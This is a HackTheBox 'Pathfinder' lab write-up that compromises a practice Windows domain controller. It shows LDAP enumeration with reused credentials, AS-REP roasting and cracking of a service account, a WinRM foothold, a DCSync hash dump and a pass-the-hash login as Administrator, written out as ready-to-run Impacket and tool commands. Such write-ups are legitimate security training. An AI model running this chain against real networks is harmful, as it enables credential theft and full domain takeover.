Logo
HackTheBox - Pathfinder Writeup
index

Enumeration

  • scan top 1000 ports
Terminal window
nmap -sC -sV -oN nmap/initial 10.10.10.30
  • the result
# Nmap 7.91 scan initiated Sat Jul 10 02:31:44 2021 as: nmap -sC -sV -oN nmap/initial 10.10.10.30
Nmap scan report for 10.10.10.30
Host is up (0.34s latency).
Not shown: 989 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-10 01:40:02Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: PATHFINDER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h07m25s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-07-10T01:40:31
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul 10 02:33:21 2021 -- 1 IP address (1 host up) scanned in 96.82 seconds
  • scan all ports
Terminal window
nmap -sC -sV -p- -oN nmap/all_ports 10.10.10.30
  • the result
# Nmap 7.91 scan initiated Tue Jul 13 07:49:25 2021 as: nmap -sC -sV -p- -oN nmap/all_ports megacorp.local
Nmap scan report for megacorp.local (10.10.10.30)
Host is up (0.34s latency).
rDNS record for 10.10.10.30: MEGACORP.LOCAL
Not shown: 65511 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-13 07:24:15Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49683/tcp open msrpc Microsoft Windows RPC
49695/tcp open msrpc Microsoft Windows RPC
49714/tcp open msrpc Microsoft Windows RPC
Service Info: Host: PATHFINDER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h07m28s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-07-13T07:25:12
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jul 13 08:17:58 2021 -- 1 IP address (1 host up) scanned in 1712.57 seconds

Open Ports

  • Well, that’s a lot of open port
  • with quick scan. Looks like this is Domain Controller

Hosts

  • First, I’m gonna add MEGACORP.LOCAL into /etc/hosts file

add hostname in /etc/hosts

add hostname in /etc/hosts

LDAP

Summary

The Lightweight Directory Access Protocol is an open, vendor-neutral, industry standard application protocol for accessing and maintaining distributed directory information services over an Internet Protocol network.

LDAPsearch

  • Enumerate LDAP (Lightweight Directory Access Protocol)
  • By using the tool called ldapsearch

LDAP QUERY [ldapsearch]

Terminal window
ldapsearch -x -h megacorp.local -s base namingcontexts
  • the result

ldapsearch

ldapsearch

LDAP DUMP [ldapsearch]

Terminal window
ldapsearch -x -h megacorp.local -b "dc=megacorp,dc=local"
  • the result

ldapsearch query error

ldapsearch query error

  • well, the operation was error
  • lucky for me. I’ve got sandra credentials from previous box shield
  • let’s try bind it with those creds
Terminal window
ldapsearch -x -h megacorp.local -b "dc=megacorp,dc=local" -D '[email protected]' -w 'where_you_put_the_password_in'
  • the result

ldapsearch query with sandra credentials

ldapsearch query with sandra credentials

  • the output pretty much crazy and crazy
  • above was the snippet of it ;)
  • so, I’m gonna save it in file called ldump_all

LDAP DUMP USER [ldapsearch]

Terminal window
ldapsearch -x -h megacorp.local -b "dc=megacorp,dc=local" -D '[email protected]' -w 'where_you_put_the_password_in' "(&(objectClass=person)(objectClass=user))"
  • the result
Terminal window
# extended LDIF
#
# LDAPv3
# base <dc=megacorp,dc=local> with scope subtree
# filter: (&(objectClass=person)(objectClass=user))
# requesting: ALL
#
# Administrator, Users, MEGACORP.LOCAL
dn: CN=Administrator,CN=Users,DC=MEGACORP,DC=LOCAL
objectClass: top
objectClass: person
--[[SNIP]]--
# search reference
ref: ldap://ForestDnsZones.MEGACORP.LOCAL/DC=ForestDnsZones,DC=MEGACORP,DC=LOC
AL
# search reference
ref: ldap://DomainDnsZones.MEGACORP.LOCAL/DC=DomainDnsZones,DC=MEGACORP,DC=LOC
AL
# search reference
ref: ldap://MEGACORP.LOCAL/CN=Configuration,DC=MEGACORP,DC=LOCAL
# search result
search: 2
result: 0 Success
# numResponses: 10
# numEntries: 6
# numReferences: 3
  • Finally, we’ve got all the users

users list

users list

  • Well, I can’t find anything usefull
  • So, I went to the internet for searching tool for dumping user from LDAP
  • Finally, I found one that can work

LDAP DUMP [ldapdomaindump]

  • Let’s dump all the user
  • Before, I run the command. I’m gonna make a folder real quick called ldap_dumps
  • Source
Terminal window
ldapdomaindump -u megacorp\\sandra -p put_the_passwd_in -o ldap_dumps 10.10.10.30

ldapdomaindump

ldapdomaindump

  • the command above is dumping all in folder called ldap_dumps
  • the result, we’ve got a lot of file
  • let’s take a look at domain_users.html

view domain_users.html

view domain_users.html

Kerberos

Summary

Kerberos (/ˈkɜːrbərɒs/) is a computer-network authentication protocol that works on the basis of tickets to allow nodes communicating over a non-secure network to prove their identity to one another in a secure manner.
The protocol was named after the character Kerberos (or Cerberus) from Greek mythology, the ferocious three-headed guard dog of Hades.

Kerberos - [DONT_REQ_PREAUTH]

Impacket [GetNPUsers.py]

Summary

This script will attempt to list and get TGTs for those users that have the property Do not require Kerberos preauthentication set (UF_DONT_REQUIRE_PREAUTH).

  • svc_bes user have very unique flags that state DONT_REQ_PREAUTH
  • with those flags. I’m gonna use this impacket tool called GetNPUsers.py
  • the output will save in file called svc_bes.hash in John-The-Ripper[JtR] format.
Terminal window
GetNPUsers.py megacorp.local/svc_bes -no-pass -request -format john > svc_bes.hash

John-The-Ripper

  • Use JtR for cracking the file
  • the result

cracked svc_bes hash

cracked svc_bes hash

  • Now, We’ve got the svc_bes user password

Foothold/Gaining Access

Evil-Winrm

Terminal window
evil-winrm -i 10.10.10.30 -u svc_bes -p put_the_password_here

login as svc_bes

login as svc_bes

User Flag

user flag

user flag

Privilege Escalation

DCSync Attack

Summary

DCSync is a credential dumping technique that can lead to the compromise of individual user credentials, and more seriously as a prelude to the creation of a Golden Ticket, as DCSync can be used to compromise the krbtgt account’s password.

Impacket [SecretsDump.py]

Summary

Performs various techniques to dump hashes from the remote machine without executing any agent there.

Terminal window
secretsdump.py megacorp.local/svc_bes:[email protected]
  • the result

DCSync attack

DCSync attack

  • We manage to dump all the users hash

  • The most important hash is the Administrator hash

  • Do we crack it?
    • Actually… We can login as Administrator by using password hashes
  • By using another Impacket script called psexec.py

Impacket [psexec.py]

Summary

PSEXEC like functionality example using RemComSvc, with the help of python script we can use this module for connecting host machine remotely.

Terminal window
psexec.py megacorp.local/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:8a4b77d5xxxxxxxxxxxxxxxxx
  • the result

login as nt authority\system

login as nt authority\system

Admin flag

root flag

root flag

Conclusion

I’ve learned a lot today. I’m new to the AD/Domain Controller Hacks or whatever you want to call it :). This machine is so fun and I’ve gained a lot of knowledge about it. Do not rely on one tool only. You need to explore and find another tool and understanding it. Lastly, it is important to configure the user correctly and securely. Before I forgot, again do not put any credentials on the non-secure machine. Even tho it’s happened, quickly change the password.

I have a fun time doing this machine and I hope you guys do too. Bye ;)